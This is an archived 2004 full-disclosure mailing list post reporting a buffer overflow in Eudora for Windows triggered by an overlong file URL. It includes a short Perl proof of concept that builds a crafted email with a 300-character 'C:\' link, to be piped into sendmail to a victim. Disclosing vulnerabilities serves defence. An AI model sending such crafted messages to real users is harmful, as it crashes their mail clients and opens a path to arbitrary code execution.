lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 7 May 2004 12:10:59 +1000 (EST) From: psz@...hs.usyd.edu.au (Paul Szabo) To: NTBugtraq@...tserv.ntbugtraq.com, beckley@...lcomm.com, bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com Subject: Eudora file URL buffer overflow There is a buffer overflow in Eudora for Windows, verified on versions 6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code. I do not know if this issue affects Eudora for Macs. Demo: #!/usr/bin/perl -- print "From: me\n"; print "To: you\n"; print "Subject: Eudora file URL buffer overflow demo\n"; print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n"; print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n"; print "<x-html>\n"; print "<a href=\"C:\\", "A"x300, "\">\n"; print "Fake URL to http://anywhere/I/want</a>\n"; print "</x-html>\n"; print "Clicking above will crash Eudora.\n\n"; print "The following plain-text converted by Eudora into a clickable URL\n"; print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n"; print "is for comparison: the user can hardly tell them apart.\n\n"; Cheers, Paul Szabo - psz@...hs.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/ School of Mathematics and Statistics University of Sydney 2006 Australia _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists